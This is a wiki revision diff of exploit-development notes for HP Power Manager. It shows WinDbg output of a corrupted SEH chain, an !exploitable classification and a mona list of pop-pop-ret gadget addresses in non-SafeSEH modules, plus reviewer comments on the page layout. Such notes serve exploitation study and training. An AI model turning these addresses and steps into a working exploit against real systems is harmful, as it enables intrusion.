exploiting:windows:hppowerman

exploiting:windows:hppowerman [2019/05/07 15:34] – created ebaer
exploiting:windows:hppowerman [2019/05/07 15:48] (current) ebaer
Line 472: Line 472:
  
 </code> </code>
 +
 +===== Exception Handler =====
 +
 +<code>
 +0:000> d fs:[0]
 +0053:00000000  0018f80c 00190000 0018b000 00000000
 +0053:00000010  00001e00 00000000 7efdd000 00000000
 +0053:00000020  00000c10 00000dbc 00000000 00625340
 +0053:00000030  7efde000 00000003 00000000 00000000
 +0053:00000040  00000000 00000000 00000000 00000000
 +0053:00000050  00000000 00000000 00000000 00000000
 +0053:00000060  00000000 00000000 00000000 00000000
 +0053:00000070  00000000 00000000 00000000 00000000
 +0:000> d 0018f80c 
 +0018f80c  41414141 41414141 41414141 41414141
 +0018f81c  41414141 41414141 41414141 41414141
 +0018f82c  41414141 41414141 41414141 41414141
 +0018f83c  41414141 41414141 41414141 41414141
 +0018f84c  41414141 41414141 41414141 41414141
 +0018f85c  41414141 41414141 41414141 41414141
 +0018f86c  41414141 41414141 41414141 41414141
 +0018f87c  41414141 41414141 41414141 41414141
 +</code>
 +
 +
 +<code>
 +0:000> !exchain
 +0018f80c: 41414141
 +Invalid exception stack at 41414141
 +
 +</code>
 +
 +===== Exploitable? =====
 +
 +<code>
 +0:005> .load msec
 +0:005> !exploitable
 +
 +!exploitable 1.6.0.0
 +*** WARNING: Unable to verify checksum for C:\Program Files (x86)\HP\Power Manager\DevManBE.exe
 +*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\HP\Power Manager\DevManBE.exe
 +Exploitability Classification: EXPLOITABLE
 +Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at msvcrt!_get_printf_count_output+0x000000000000002e (Hash=0x65c12afd.0x93798406)
 +
 +Corruption of the exception handler chain is considered exploitable
 +
 +</code>
 +
  
 ===== Step ===== ===== Step =====
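Review bot: the Exception Handler section drops three debugger dumps on the reader with no explanatory sentence, and the thread context changes between them: the `d fs:[0]` and `!exchain` output comes from thread 0:000, while `.load msec` / `!exploitable` runs on 0:005. State which thread raised the exception and keep all dumps on that thread, otherwise it is not clear that the corrupted chain and the EXPLOITABLE classification describe the same crash. One line saying that the first dword at fs:[0] (0018f80c) is the head of the SEH chain and that both fields of that record read 41414141 would explain why `!exchain` reports "Invalid exception stack at 41414141". Also worth recording next to the `!exploitable` output: symbols could not be loaded for DevManBE.exe, so the stack hash and the msvcrt!_get_printf_count_output+0x2e location were produced without symbols for that module and frames inside it are unreliable; the "Exception Handler Chain Corrupted" classification is the part of the output that stands on its own.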
Line 495: Line 543:
 </code> </code>
  
 +
 +
 +====== SafeSEH exploit ======
 +
 +<code>
 +0:005> .load pykd.pyd
 +0:005> !py mona seh
 +Hold on...
 +[+] Command used:
 +!py mona.py seh
 +
 +---------- Mona command started on 2019-05-07 06:48:06 (v2.0, rev 585) ----------
 +[+] Processing arguments and criteria
 +    - Pointer access level : X
 +[+] Generating module info table, hang on...
 +    - Processing modules
 +    - Done. Let's rock 'n roll.
 +[+] Querying 3 modules
 +    - Querying module MSVCP60.dll
 +    - Querying module DevManBE.exe
 +    - Querying module DCL.dll
 +[+] Setting pointer access level criteria to 'R', to increase search results
 +    New pointer access level : R
 +[+] Preparing output file 'seh.txt'
 +    - (Re)setting logfile c:\_c\mona\seh.txt
 +[+] Writing results to c:\_c\mona\seh.txt
 +    - Number of pointers of type 'add esp,8 # ret 0x04' : 2 
 +    - Number of pointers of type 'pop ebp # pop ebx # ret 0x04' : 4 
 +    - Number of pointers of type 'pop edi # pop esi # ret 0x04' : 17 
 +    - Number of pointers of type 'pop esi # pop ebx # ret 0x04' : 111 
 +    - Number of pointers of type 'pop ecx # pop ecx # ret ' : 39 
 +    - Number of pointers of type 'pop edi # pop esi # ret 0x08' : 13 
 +    - Number of pointers of type 'pop esi # pop ebx # ret 0x08' : 6 
 +    - Number of pointers of type 'add esp,8 # ret 0x08' : 20 
 +    - Number of pointers of type 'pop ecx # pop ecx # ret 0x04' : 2 
 +    - Number of pointers of type 'call dword ptr ss:[esp+08]' : 4 
 +    - Number of pointers of type 'pop edi # pop esi # ret 0x20' : 4 
 +    - Number of pointers of type 'pop esi # pop edi # ret ' : 1 
 +    - Number of pointers of type 'pop ebx # pop ecx # ret 0x08' : 2 
 +    - Number of pointers of type 'pop ebx # pop ebp # ret ' : 1 
 +    - Number of pointers of type 'pop ebx # pop ecx # ret ' : 8 
 +    - Number of pointers of type 'pop esi # pop ebp # ret 0x0c' : 4 
 +    - Number of pointers of type 'pop ebx # pop ebp # ret 0x10' : 15 
 +    - Number of pointers of type 'pop ebx # pop ecx # ret 0x04' : 6 
 +    - Number of pointers of type 'call dword ptr ss:[esp+2c]' : 1 
 +    - Number of pointers of type 'pop edi # pop ebp # ret 0x0c' : 1 
 +    - Number of pointers of type 'pop ebp # pop ebx # ret 0x10' : 1 
 +    - Number of pointers of type 'pop ebx # pop ebp # ret 0x0c' : 12 
 +    - Number of pointers of type 'pop esi # pop ecx # ret ' : 10 
 +    - Number of pointers of type 'pop ebp # pop ecx # ret 0x0c' : 1 
 +    - Number of pointers of type 'pop edi # pop esi # ret 0x10' : 4 
 +    - Number of pointers of type 'pop esi # pop ebx # ret 0x10' : 4 
 +    - Number of pointers of type 'pop esi # pop edi # ret 0x04' : 1 
 +    - Number of pointers of type 'pop edi # pop esi # ret ' : 27 
 +    - Number of pointers of type 'pop esi # pop ebx # ret ' : 23 
 +    - Number of pointers of type 'pop esi # pop ebx # ret 0x0c' : 8 
 +    - Number of pointers of type 'pop edi # pop esi # ret 0x0c' : 19 
 +    - Number of pointers of type 'pop esi # pop ebp # ret ' : 10 
 +    - Number of pointers of type 'pop edi # pop ebx # ret 0x04' : 1 
 +    - Number of pointers of type 'pop ebx # pop edi # ret ' : 3 
 +    - Number of pointers of type 'pop edi # pop ebx # ret ' : 2 
 +    - Number of pointers of type 'pop esi # pop ebp # ret 0x20' : 3 
 +    - Number of pointers of type 'pop ebx # pop ebp # ret 0x20' : 1 
 +    - Number of pointers of type 'pop edi # pop ebp # ret ' : 6 
 +    - Number of pointers of type 'pop ebp # pop ebx # ret ' : 12 
 +    - Number of pointers of type 'pop esi # pop ecx # ret 0x04' : 4 
 +    - Number of pointers of type 'pop ebp # pop ebx # ret 0x0c' : 1 
 +    - Number of pointers of type 'pop ebp # pop ebx # ret 0x08' : 6 
 +    - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1 
 +    - Number of pointers of type 'pop ebx # pop esi # ret ' : 1 
 +    - Number of pointers of type 'add esp,8 # ret ' : 42 
 +    - Number of pointers of type 'add esp,4 # pop ebp # ret ' : 7 
 +    - Number of pointers of type 'pop esi # pop ebp # ret 0x04' : 5 
 +[+] Results : 
 +0x1000672b |   0x1000672b : add esp,8 # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
 +0x1000678d |   0x1000678d : add esp,8 # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
 +0x0047001c |   0x0047001c : pop ebp # pop ebx # ret 0x04 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
 +0x0047f13d |   0x0047f13d : pop ebp # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
 +0x10002b0a |   0x10002b0a : pop ebp # pop ebx # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
 +0x10002b64 |   0x10002b64 : pop ebp # pop ebx # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
 +0x7608165a |   0x7608165a : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x7608573e |   0x7608573e : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x76085758 |   0x76085758 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x760857cf |   0x760857cf : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x760857e9 |   0x760857e9 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x76085815 |   0x76085815 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x76085cdd |   0x76085cdd : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x76097a75 |   0x76097a75 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x76097aa5 |   0x76097aa5 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x76097f2f |   0x76097f2f : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x76097f60 |   0x76097f60 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
 +0x00444527 |   0x00444527 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
 +0x00476b25 |   0x00476b25 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
 +0x004820d1 |   0x004820d1 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
 +... Please wait while I'm processing all remaining results and writing everything to file...
 +[+] Done. Only the first 20 pointers are shown here. For more pointers, open c:\_c\mona\seh.txt...
 +    Found a total of 476 pointers
 +
 +[+] This mona.py action took 0:00:02.870000
 +
 +</code>
  
  
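Review bot: the heading "====== SafeSEH exploit ======" is a level-1 heading while the surrounding sections ("===== Exception Handler =====", "===== Exploitable? =====", "===== Step =====") are level 2, and its wording says the opposite of what the output shows: every pointer mona lists sits in a module flagged "SafeSEH: False" (DCL.dll, DevManBE.exe and the bundled MSVCP60.dll v6.2.3104.0), all also "ASLR: False, Rebase: False". Retitle it to match (e.g. "===== Non-SafeSEH modules =====") and add one sentence stating that finding, since it is the actual result of the section: the handler overwrite would have been rejected had the three modules in C:\Program Files (x86)\HP\Power Manager been linked with /SAFESEH, and the fixed addresses would not be reusable had they been built with /DYNAMICBASE. Two details of the run also deserve a note for anyone reproducing it: mona relaxed the pointer access level from X to R ("Setting pointer access level criteria to 'R'"), and only 20 of the 476 pointers are printed, the rest being in c:\_c\mona\seh.txt.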
exploiting/windows/hppowerman.1557236084.txt.gz · Last modified: 2019/05/07 15:34 by ebaer
